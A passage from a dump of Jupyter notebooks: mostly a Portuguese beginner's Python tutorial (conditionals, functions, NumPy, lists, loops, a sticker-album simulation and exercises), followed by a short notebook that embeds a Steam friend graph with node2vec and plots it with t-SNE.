"Veja abaixo como funciona a estrutura geral de condicionais no Python. \n\nTemos a versão IF ELSE, e a versão IF ELIF ELSE.\n\nNote que é possível utilizar o ELIF várias vezes se necessário.\n\nNo espaço de condição, o Python espera um objeto booleano. Se for True, ele executa, se for False, segue adiante. \n\nNote também a estrutura de identação do Python. Aqui não usamos (), [] ou {} para estipular o que deve ser executado nas condicionais. Simplesmente colocamos o código que deve ser executado na linha seguinte, mas identado. Em geral, se utiliza o espaço de **1 tab**.",
"_____no_output_____"
]
],
[
[
"# sintaxe IF-ELSE geral\nif condição:\n executa aqui\nelse:\n executa aqui\n\n# sintaxe IF-ELIF-ELSE geral\nif condição:\n executa aqui\nelif outra_condição:\n executa aqui\nelse:\n executa aqui\n\n#não executar essa célula!",
"_____no_output_____"
],
[
"a, b, c = 1, -2 , 0\n\ndelta = b**2 - 4*a*c\n\nif delta > 0:\n x1 = (-b + delta**0.5)/(2*a)\n x2 = (-b - delta**0.5)/(2*a)\n print('As raízes são {} e {}'.format(x1, x2))\nelif delta == 0:\n x = -b/(2*a)\n print('A única raíz é {}'.format(x))\nelse:\n print('Não há soluções reais para essa equação')",
"As raízes são 3.0 e 1.0\n"
]
],
[
[
"## **Definição de Funções** <a name=\"defi\"></a>",
"_____no_output_____"
],
[
"Uma função é um recurso para não precisarmos repetir o mesmo código desnecessariamente. Assim como as funções da matemática, sua tarefa é transformar um input, uma entrada, uma coleção de variáveis, em uma saída, um output. \n\nNo exemplo abaixo, utilizamos como variáveis o tipo de símbolo e o tamanho da linha que queremos fazer. Você entenderá melhor vendo o exemplo:\n\nDa mesma maneira que na estrutura de condicionais, o conteúdo de uma função fica nas linhas seguintes sendo indicados pela **indentação** do código",
"_____no_output_____"
]
],
[
[
"def Mensagem(simbolo = '*', tamanho = 51):\n print(simbolo*tamanho)\n print('Estamos só começando, o melhor ainda estar por vir!')\n print(simbolo*tamanho)",
"_____no_output_____"
],
[
"Mensagem('-', 51) ",
"---------------------------------------------------\nEstamos só começando, o melhor ainda estar por vir!\n---------------------------------------------------\n"
]
],
[
[
"Voltando no exemplo da fórmula de Bhaskara, fica bem conveniente quando colocamos no formato de função, para analisar as saídas de maneira mais prática. ",
"_____no_output_____"
]
],
[
[
"def Bhaskara(a, b, c):\n # dando uma resposta adequada para quando o valor de a for igual a zero\n if a == 0:\n print('Quando a = 0 não se aplica Bhaskara')\n else:\n delta = b**2 - 4*a*c\n\n if delta > 0:\n x1 = (-b + delta**0.5)/(2*a)\n x2 = (-b - delta**0.5)/(2*a)\n print('As raízes são {} e {}'.format(round(x1, 2), round(x2, 2)))\n elif delta == 0:\n x = -b/(2*a)\n print('A única raíz é {}'.format(x))\n else:\n print('Não há soluções reais para essa equação')",
"_____no_output_____"
],
[
"Bhaskara(3, 2, 0.9)",
"Não há soluções reais para essa equação\n"
]
],
[
[
"## **Importação de Bibliotecas** <a name=\"impo\"></a>",
"_____no_output_____"
]
],
[
[
"from math import pi\nprint(pi)",
"3.141592653589793\n"
],
[
"import math\nprint(math.pi)",
"3.141592653589793\n"
],
[
"import math as m\nprint(m.pi)",
"3.141592653589793\n"
]
],
[
[
"## **A Biblioteca Numpy** <a name=\"nump\"></a>",
"_____no_output_____"
],
[
"Numpy é a biblioteca mais popular do python para se trabalhar com arrays. \n\nArrays são conjuntos de valores, que podem ser n-dimensionais. \n\nGeralmente, um número apenas, um ponto, é um array de dimensão 0\n\nUma lista de valores é um array de dimensão 1. \n\nUma matriz de valores é uma array de dimensão 2. \n\nUm tensor de valores é um array de dimensão 3. \n",
"_____no_output_____"
]
],
[
[
"import numpy as np",
"_____no_output_____"
],
[
"a0 = np.array(1)\na1 = np.array([1, 2])\na2 = np.array([[1, 2], [3, 4]])\na3 = np.array([[[1, 2], [3, 4]], [[5, 6], [7, 8]]])",
"_____no_output_____"
],
[
"print('Array a0:\\n', a0)\nprint('Array a1:\\n', a1)\nprint('Array a2:\\n', a2)\nprint('Array a3:\\n', a3)",
"Array a0:\n 1\nArray a1:\n [1 2]\nArray a2:\n [[1 2]\n [3 4]]\nArray a3:\n [[[1 2]\n [3 4]]\n\n [[5 6]\n [7 8]]]\n"
]
],
[
[
"Use o atributo ndim para verificar a dimensão dos arrays numpy",
"_____no_output_____"
]
],
[
[
"print('Dimensão de a0:', a0.ndim)\nprint('Dimensão de a1:', a1.ndim)\nprint('Dimensão de a2:', a2.ndim)\nprint('Dimensão de a3:', a3.ndim)",
"Dimensão de a0: 0\nDimensão de a1: 1\nDimensão de a2: 2\nDimensão de a3: 3\n"
]
],
[
[
"Transforme uma lista em um array",
"_____no_output_____"
]
],
[
[
"lista = [1, 2, 3, 4]\narray = np.array(lista)",
"_____no_output_____"
]
],
[
[
"Arrays são feitos para se trabalhar com álgebra linear. Veja a diferença quando multiplicamos cada elemento por um escalar",
"_____no_output_____"
]
],
[
[
"print(2*lista)\nprint(2*array)",
"[1, 2, 3, 4, 1, 2, 3, 4]\n[2 4 6 8]\n"
]
],
[
[
"Similarmente, podemos realizar as demais operações com arrays",
"_____no_output_____"
]
],
[
[
"print(array + array)\nprint(array * 2)\nprint(array / 3)\nprint(array ** 2)\nprint(array // 2)\nprint(array % 2)",
"[2 4 6 8]\n[2 4 6 8]\n[0.33333333 0.66666667 1. 1.33333333]\n[ 1 4 9 16]\n[0 1 1 2]\n[1 0 1 0]\n"
]
],
[
[
"## **Listas** <a name=\"lists\"></a>",
"_____no_output_____"
],
[
"Um objeto do tipo lista é um dos mais importantes do universo Python. Sua versatilidade permite a construção e organização simples de diversas funcionalidades. **Uma lista é definida por conchetes [ ]**. Vejamos alguns exemplos:",
"_____no_output_____"
]
],
[
[
"minha_lista = [1, 1, 2, 3, 5, 8, 13]",
"_____no_output_____"
],
[
"print(minha_lista)",
"[1, 1, 2, 3, 5, 8, 13]\n"
],
[
"len(minha_lista)",
"_____no_output_____"
]
],
[
[
"**Importante**: A indexação no Python, assim como em diversas linguagens de programação, começam com índice 0\n\nIsso quer dizer que o primeiro elemento está na entrada 0 da lista, o segundo elemento na entrada 1, e assim por diante.\n\nNós acessamos os elementos de uma lista também utilizando **colchetes**",
"_____no_output_____"
]
],
[
[
"minha_lista[0]",
"_____no_output_____"
],
[
"minha_lista[len(minha_lista) - 1]",
"_____no_output_____"
]
],
[
[
"Uma lista permite armazenar todos os tipos de objetos do Python, veja no exemplo abaixo:",
"_____no_output_____"
]
],
[
[
"lista = ['Python', 1996, True, len, [1,2,'Ricardo']]\nprint(lista)",
"['Python', 1996, True, <built-in function len>, [1, 2, 'Ricardo']]\n"
],
[
"lista[0] + ' é muito massa' ",
"_____no_output_____"
],
[
"lista[1] + 1337",
"_____no_output_____"
],
[
"lista[2] and True",
"_____no_output_____"
],
[
"lista[3](lista)",
"_____no_output_____"
]
],
[
[
"Podemos acessar caracteres de listas através de colchetes também. No python, strings são como listas de caracteres:",
"_____no_output_____"
]
],
[
[
"'Python'[0]",
"_____no_output_____"
],
[
"py = 'Python'\npy[0] + py[5]",
"_____no_output_____"
]
],
[
[
"E podemos acessar listas dentro de listas",
"_____no_output_____"
]
],
[
[
"lista[4]",
"_____no_output_____"
],
[
"lista[4][2]",
"_____no_output_____"
],
[
"lista[4][2][0]",
"_____no_output_____"
],
[
"lista[0]",
"_____no_output_____"
],
[
"lista[0][0]",
"_____no_output_____"
]
],
[
[
"Alguns comandos úteis para acessar elementos em listas:",
"_____no_output_____"
]
],
[
[
"frase = 'Python é excelente para análise de dados'",
"_____no_output_____"
],
[
"frase[:6] #retorna todos os elementos até o indice 6 da lista (o indice 6 (sétimo elemento) não está incluido)",
"_____no_output_____"
],
[
"frase[6:] #retorna todos os elementos após o indice 6 da lista",
"_____no_output_____"
]
],
[
[
"No Python, o padrão é trabalhar com **intervalos semi-abertos [ , )**, como no exemplo abaixo. O índice 9 está incluso na seleção, mas não o 18. ",
"_____no_output_____"
]
],
[
[
"frase[9:18] # retorna o elemento de indice 9 até o 18, mas não inclui o 18",
"_____no_output_____"
]
],
[
[
"Para inverter a ordem de uma lista, utilize",
"_____no_output_____"
]
],
[
[
"frase[::-1]",
"_____no_output_____"
]
],
[
[
"Para tomar elementos de 2 em 2, utilize",
"_____no_output_____"
]
],
[
[
"frase[::2]",
"_____no_output_____"
]
],
[
[
"Combine os comandos da maneira que lhe for conveniente",
"_____no_output_____"
]
],
[
[
"frase[::-1][::3]",
"_____no_output_____"
]
],
[
[
"## **Métodos de Listas** <a name=\"metl\"></a>",
"_____no_output_____"
],
[
"**Métodos são como funções que são aplicáveis a um certo tipo de objetos.** Nesse caso, veremos os métodos para os objetos do tipo lista. Métodos são inerentes ao Python pelo contexto de programação orientada a objetos, que veremos com mais detalhes adiante nesse curso",
"_____no_output_____"
]
],
[
[
"lista = ['A', 'B']",
"_____no_output_____"
],
[
"lista.append('C')\nlista\n ",
"_____no_output_____"
],
[
"lista.pop()",
"_____no_output_____"
],
[
"lista.count('B')",
"_____no_output_____"
],
[
"lista.index('B')",
"_____no_output_____"
]
],
[
[
"## **Métodos de Strings** <a name=\"mets\"></a>\n",
"_____no_output_____"
]
],
[
[
"nome = 'Ricardo Rocha'",
"_____no_output_____"
],
[
"nome.lower()",
"_____no_output_____"
],
[
"nome.upper()",
"_____no_output_____"
],
[
"nome.capitalize()",
"_____no_output_____"
],
[
"nome.split(' ')",
"_____no_output_____"
]
],
[
[
"## **Funções Importantes** <a name=\"func\"></a>",
"_____no_output_____"
],
[
"O comando **input** serve para se comunicar com o usuário enquanto se executa um programa. Veja o exemplo abaixo",
"_____no_output_____"
]
],
[
[
"x = input('Digite o seu nome: ')",
"Digite o seu nome: Ricardo\n"
],
[
"print(x)",
"Ricardo\n"
],
[
"y = input('Digite a sua idade: ')\nprint('\\nA idade declarada foi {}'.format(y))",
"Digite a sua idade: 33\n\nA idade declarada foi 33\n"
]
],
[
[
"Mas note que os inputs são sempre no format string. Se quisermos usá-lo numericamente, temos que converter as entradas adequadamanente. Em geral usamos a função **int** para inteiros ou **float** para números reais. Você pode usar a função float para números que são inteiros também.",
"_____no_output_____"
]
],
[
[
"y = int(input('Digite a sua idade '))\n\nprint('\\nSe você já fez aniversário esse ano, seu ano de nascimento foi {}.'.format(2020 - y))",
"Digite a sua idade 33\n\nSe você já fez aniversário esse ano, seu ano de nascimento foi 1987.\n"
]
],
[
[
"\n\n---\n\n",
"_____no_output_____"
],
[
"A função **range** cria um objeto capaz de gerar listas de valores entre dois números. Ela não gera a lista em si, mas um gerador de lista pra quando ela for utilizada. **Ela trabalha com intervalos semi-abertos do tipo [ , )**. Veja os exemplos.",
"_____no_output_____"
]
],
[
[
"range(4)",
"_____no_output_____"
]
],
[
[
"Para listar os valores da função range, utilize o comando **list**",
"_____no_output_____"
]
],
[
[
"list(range(4))",
"_____no_output_____"
]
],
[
[
"Use-a com dois parâmetros para definir o começo e o fim da lista. Note que o primeiro valor é incluido, mas o último não, pois o intervalo dela é semi-aberto",
"_____no_output_____"
]
],
[
[
"list(range(3, 10))",
"_____no_output_____"
]
],
[
[
"Você ainda pode usar um terceiro parâmetro, que é o passo da lista. Ele deve ser inteiro e representa o salto de um número para o outro.",
"_____no_output_____"
]
],
[
[
"list(range(2, 21, 2))",
"_____no_output_____"
],
[
"list(range(10, 101, 10))",
"_____no_output_____"
]
],
[
[
"A função **list** também pode ser utilizada para quebrar uma string em caracteres dentro de uma lista, veja:",
"_____no_output_____"
]
],
[
[
"list('Python')",
"_____no_output_____"
]
],
[
[
"## **Iteradores FOR e WHILE** <a name=\"iter\"></a>",
"_____no_output_____"
],
[
"Utilizamos a estrutura de repetição FOR sempre que desejamos repetir um certo pedaço de código, com alterações ou não, por um número pre-determinado de vezes.\n\nVeja os exemplos",
"_____no_output_____"
]
],
[
[
"for variante in lista_de_variações:\n codigo a ser repetido\n\n#esquema geral do FOR, não executar esse bloco",
"_____no_output_____"
],
[
"for i in ['banana', 'mamão', 'abacate']:\n print('Eu gosto de {}'.format(i))",
"Eu gosto de banana\nEu gosto de mamão\nEu gosto de abacate\n"
],
[
"for i in range(10):\n print(i*'*')",
"\n*\n**\n***\n****\n*****\n******\n*******\n********\n*********\n"
]
],
[
[
"Problema: Se eu tomar dois números inteiros no intervalo [1, 10], qual a probabilidade aproximada da soma dos números ser maior que 10?",
"_____no_output_____"
]
],
[
[
"from random import randint\nlista = []\nreplicas = 10000\n\nfor i in range(replicas):\n if randint(1,10) + randint (1,10) > 10:\n lista.append(True)\n else:\n lista.append(False)\n\nprob = sum(lista)/replicas\n\nprint('A probabilidade aproximada é {}%'.format(100*prob))",
"A probabilidade aproximada é 54.52%\n"
]
],
[
[
"\n\n---\n\n",
"_____no_output_____"
],
[
"O iterador WHILE usamos quando queremos repetir código sem saber de antemão quando este deve ser interrompido. Ele será finalizado quando alguma condição for satisfeita. \n\nPor isso, tome cuidado em não escrever um WHILE infinito. Você terá que cancelar a execução do código para pará-lo.\n\nVeja a estrutura geral",
"_____no_output_____"
]
],
[
[
"while condicao_verdadeira:\n codigo repetido\n if condicao:\n break\n \n#esquema geral do FOR, não executar esse bloco",
"_____no_output_____"
],
[
"i = 1\nwhile i <= 10:\n print(i * '*') \n i += 1",
"*\n**\n***\n****\n*****\n******\n*******\n********\n*********\n**********\n*\n"
]
],
[
[
"Código equivalente utilizando o comando break para interromper o loop",
"_____no_output_____"
]
],
[
[
"i = 1\nwhile True:\n print(i * '*') \n i += 1\n if i == 10:\n break\n",
"*\n**\n***\n****\n*****\n******\n*******\n********\n*********\n"
]
],
[
[
"Exemplo de um **while** infinito",
"_____no_output_____"
]
],
[
[
"while True:\n print('Python é legal demais!')",
"_____no_output_____"
]
],
[
[
"O **while** também aceita o comando **else** no após o seu fim. Algo para executar após o break acontecer",
"_____no_output_____"
]
],
[
[
"i = 1\nwhile i <= 10:\n print(i * '*') \n i += 1\nelse:\n print('*')",
"*\n**\n***\n****\n*****\n******\n*******\n********\n*********\n**********\n*\n"
]
],
[
[
"## ***Projeto: simulação de um álbum de figurinhas*** <a name=\"proj\"></a>",
"_____no_output_____"
],
[
"### EXEMPLO: **Álbum Premier League 2019-2020**\n1. Total de cromos: **636**\n2. Preço do livro ilustrado capa brochura: **R\\$ 8,90**\n3. Envelope com 5 cromos: **R\\$ 2,50**\n\n### SUPOSIÇÕES\n1. Todas as figurinhas tem igual probabilidade de serem sorteradas\n2. Um pacotinho é comprado por vez \n\n### ALGORITMO\n1. Comprar um pacotinho de figurinhas (5 figurinhas cada, que podem ser repetidas);\n2. Colar no álbum e verificar se o álbum está completo;\n3. Caso esteja incompleto, comprar mais um pacotinho, caso contrário, terminar.\n\n### PERGUNTAS\n1. Qual o valor médio investido para completar o álbum nessas condições?\n2. Quantos pacotes são necessários comprar, em média, para completar o álbum?\n3. Qual é a distribuição empírica do valor investido para completar o álbum?",
"_____no_output_____"
]
],
[
[
"n_album = 636\npreco_pacote = 2.50\npreco_album = 8.90\nsimulacoes = 1000",
"_____no_output_____"
],
[
"import numpy as np\n\n# representação do álbum\nalbum = np.zeros(n_album) \n\n# representação do pacote de figurinhas\npacotinho = np.random.choice(range(n_album), 5)\npacotinho\n\n# 'colando' as figurinhas obtidas no álbum\nfor i in pacotinho:\n album[i] += 1",
"_____no_output_____"
],
[
"# comprando figurinhas até completar o álbum\ndef SimulaAlbum():\n album = np.zeros(n_album) \n pacotes = 0\n while not np.all(album > 0):\n pacotinho = np.random.choice(range(n_album), 5)\n pacotes += 1\n\n for i in pacotinho:\n album[i] += 1\n \n\n valor_gasto = preco_album + preco_pacote * pacotes \n\n return valor_gasto, pacotes\n\nSimulaAlbum()",
"_____no_output_____"
],
[
"valores = []\nfor i in range(simulacoes):\n valores.append(SimulaAlbum()[0])\n if (i+1) % 50 == 0:\n print('Simulação: ', i+1, '/', simulacoes)",
"Simulação: 50 / 1000\nSimulação: 100 / 1000\nSimulação: 150 / 1000\nSimulação: 200 / 1000\nSimulação: 250 / 1000\nSimulação: 300 / 1000\nSimulação: 350 / 1000\nSimulação: 400 / 1000\nSimulação: 450 / 1000\nSimulação: 500 / 1000\nSimulação: 550 / 1000\nSimulação: 600 / 1000\nSimulação: 650 / 1000\nSimulação: 700 / 1000\nSimulação: 750 / 1000\nSimulação: 800 / 1000\nSimulação: 850 / 1000\nSimulação: 900 / 1000\nSimulação: 950 / 1000\nSimulação: 1000 / 1000\n"
]
],
[
[
"As respostas das perguntas 1 e 2, respectivamente, são:",
"_____no_output_____"
]
],
[
[
"print('O valor médio gasto foi:', round(np.mean(valores), 2))\nprint('O numero de pacotes médio foi:', round((np.mean(valores) - preco_album)/preco_pacote, 2))",
"O valor médio gasto foi: 2245.0\nO numero de pacotes médio foi: 894.44\n"
]
],
[
[
"Podemos visualizar a distribuição empírica do valor gasto através do **histograma** dos valores simulados",
"_____no_output_____"
]
],
[
[
"import matplotlib.pyplot as plt\nplt.hist(valores, bins = 20, density = True, edgecolor = 'black')\nplt.title('Distribuição Empírica do Valor Gasto para Completar o Álbum')\nplt.show()",
"_____no_output_____"
]
],
[
[
"# **Exercícios: Python para Data Science** <a name=\"exer\"></a>\nOs exercícios abaixo foram pensados para que iniciantes desenvolvam manejo e intimidade programando em python, utilizando os recursos fundamentais da linguagem.\n\nOs dois primeiros exercícios são mais simples. O exercício 3 já é um pouco mais elaborado e pode ser resolvido de várias formas. E o último exercício é apenas um complemento do projeto desenvolvido em aula sobre o álbum de figurinhas. Foram feitas mais perguntas para serem respondidas com o experimento. ",
"_____no_output_____"
],
[
"## **Exercício 1** \nConsidere um balde cuja base possui raio $r_1$ e altura igual ao diâmetro da base. Considere também uma esfera de raio $r_2$ cheia de água. Faça um programa que verifique se o volume da esfera cabe no balde, dados os valores de $r_1$ e $r_2$. \n",
"_____no_output_____"
],
[
"\n## **Exercício 2** \nCrie uma função que simule o jogo do *jokempô*, isto é, dada a entrada de dois jogadores, retorne a indicação de qual deles venceu. ",
"_____no_output_____"
],
[
"## **Exercício 3** \n\nFaça um programa que simule uma **slot machine**. Uma slot machine é uma máquina muito comum em cassinos. A pessoa puxa uma alavanca e aparecem na tela 3 símbolos aleatoriamente, de uma lista com diversos deles. Se os símbolos forem iguais, então a pessoa ganha. A pessoa entrar com um tanto escolhido de fichas, e joga até que acabe. Quando o programa terminar, uma mensagem resumindo os totais que ela ganhou deve ser exibida.",
"_____no_output_____"
],
[
"## **Exercício 4**\n\nConsidere o contexto do projeto do álbum de figurinhas e responda as perguntas adicionais: \n1. Quantas vezes saiu a figurinha mais repetida, em média?\n2. Em média, quantas figurinhas não se repetem ao completar o álbum?\n3. Qual a probabilidade de se gastar mais que R\\$3000,00 para completar o álbum?\n4. Qual a probabilidade de se gastar menos que R\\$1500,00 para completar o álbum?\n5. Qual a probabilidade de se gastar mais do que a média para completar o álbum?\n6. Qual é o intervalo de confiança de 95% para o gasto ao se completar o álbum?\n7. Qual o valor médio gasto caso se esteja completando o álbum com mais um amigo?\n8. Quanto se economiza ao utilizar o cenário da questão 7?\n9. Qual o valor médio gasto caso se esteja completando o álbum com mais dois amigos?\n10. Quanto se economiza ao utilizar o cenário da questão 9?",
"_____no_output_____"
],
[
" ## **Links Úteis** <a name=\"links\"></a>",
"_____no_output_____"
],
[
"1. [Documentação do Python](https://docs.python.org/3/)\n2. [Download do Anaconda](https://anaconda.org/)\n3. [Curso do Gustavo Guanabara no YouTube (Canal Curso em Vídeo)](https://www.youtube.com/watch?v=S9uPNppGsGo&list=PLvE-ZAFRgX8hnECDn1v9HNTI71veL3oW0)\n4. [Curso de Python gratuito do Kaggle (inglês)](https://www.kaggle.com/learn/python)\n5. [Conceitos de Python em 40min por Derek Banas (inglês)](https://www.youtube.com/watch?v=N4mEzFDjqtA) \n",
"_____no_output_____"
],
[
"## **Anexo** <a name=\"anex\"></a>\n",
"_____no_output_____"
],
[
"\n### **The Zen of Python, por Tim Peters**\n\nÉ um conjunto de regras pela qual o Python é idealizado.\n\n1. Bonito é melhor que feio.\n2. Explícito é melhor que implícito.\n3. Simples é melhor que complexo.\n4. Complexo é melhor que complicado.\n5. Plano é melhor que aglomerado.\n6. Esparso é melhor que denso.\n7. Legibilidade faz diferença.\n8. Casos especiais não são especiais o bastante para quebrar as regras.\n9. Embora a praticidade vença a pureza.\n10. Erros nunca devem passar silenciosamente.\n11. A menos que sejam explicitamente silenciados.\n12. Diante da ambigüidade, recuse a tentação de adivinhar.\n13. Deve haver um -- e preferencialmente só um -- modo óbvio para fazer algo.\n14. Embora esse modo possa não ser óbvio à primeira vista a menos que você seja holandês.\n15. Agora é melhor que nunca.\n16. Embora nunca freqüentemente seja melhor que *exatamente* agora.\n17. Se a implementação é difícil de explicar, é uma má idéia.\n18. Se a implementação é fácil de explicar, pode ser uma boa idéia.\n19. Namespaces são uma grande idéia -- vamos fazer mais dessas! ",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown"
]
] |
cb051932a7d2d02b6bf2e5a64f68b0f3e707de56 | 31,005 | ipynb | Jupyter Notebook | notebooks/node_2_vec/steam_node_2_vec.ipynb | sunnythepatel/Python-Scripts | ca8b4ea31971146689395c76e49a43216d39867b | [
"MIT"
] | 4 | 2018-10-13T00:30:25.000Z | 2020-04-23T18:06:50.000Z | notebooks/node_2_vec/steam_node_2_vec.ipynb | sunnythepatel/Python-Scripts | ca8b4ea31971146689395c76e49a43216d39867b | [
"MIT"
] | 14 | 2018-10-13T00:05:23.000Z | 2020-10-02T20:07:09.000Z | notebooks/node_2_vec/steam_node_2_vec.ipynb | sunnythepatel/Python-Scripts | ca8b4ea31971146689395c76e49a43216d39867b | [
"MIT"
] | 30 | 2018-10-13T00:18:26.000Z | 2019-12-03T13:32:44.000Z | 111.129032 | 23,908 | 0.856926 | [
[
[
"!pip install -r node2vec/requirements.txt",
"_____no_output_____"
],
[
"!pip install --upgrade gensim",
"_____no_output_____"
],
[
"!python node2vec/src/main.py --input jrtechs.edgelist --output output/jrtechs2.emd --num-walks=40 --dimensions=50",
"Walk iteration:\n1 / 40\n2 / 40\n3 / 40\n4 / 40\n5 / 40\n6 / 40\n7 / 40\n8 / 40\n9 / 40\n10 / 40\n11 / 40\n12 / 40\n13 / 40\n14 / 40\n15 / 40\n16 / 40\n17 / 40\n18 / 40\n19 / 40\n20 / 40\n21 / 40\n22 / 40\n23 / 40\n24 / 40\n25 / 40\n26 / 40\n27 / 40\n28 / 40\n29 / 40\n30 / 40\n31 / 40\n32 / 40\n33 / 40\n34 / 40\n35 / 40\n36 / 40\n37 / 40\n38 / 40\n39 / 40\n40 / 40\n"
],
[
"labels=[]\nvectors=[]\n\nwith open(\"output/jrtechs2.emd\") as fp:\n for line in fp:\n l_list = list(map(float, line.split()))\n vectors.append(l_list[1::])\n labels.append(line.split()[0])\n \nprint(len(labels))",
"39\n"
],
[
"name_map = {}\nwith open(\"friendsMap.map\") as fp:\n for line in fp:\n name_map[line.split()[0]] = line.split()[1]",
"_____no_output_____"
],
[
"name_map",
"_____no_output_____"
],
[
"from sklearn.decomposition import IncrementalPCA # inital reduction\nfrom sklearn.manifold import TSNE # final reduction\nimport numpy as np \n\ndef reduce_dimensions(labels, vectors, num_dimensions=2):\n \n # convert both lists into numpy vectors for reduction\n vectors = np.asarray(vectors)\n labels = np.asarray(labels)\n\n # reduce using t-SNE\n vectors = np.asarray(vectors)\n tsne = TSNE(n_components=num_dimensions, random_state=0)\n vectors = tsne.fit_transform(vectors)\n\n x_vals = [v[0] for v in vectors]\n y_vals = [v[1] for v in vectors]\n return x_vals, y_vals, labels\n\nvectors\nx_vals, y_vals, labels = reduce_dimensions(labels, vectors)",
"_____no_output_____"
],
[
"import matplotlib.pyplot as plt\nimport random\n\ndef plot_with_matplotlib(x_vals, y_vals, labels, num_to_label):\n plt.figure(figsize=(5, 5))\n plt.scatter(x_vals, y_vals)\n plt.title(\"Embedding Space\")\n indices = list(range(len(labels)))\n selected_indices = random.sample(indices, num_to_label)\n for i in selected_indices:\n plt.annotate(name_map[labels[i]], (x_vals[i], y_vals[i]))\n plt.savefig('ex.png')\n \nplot_with_matplotlib(x_vals, y_vals, labels, 12)",
"_____no_output_____"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.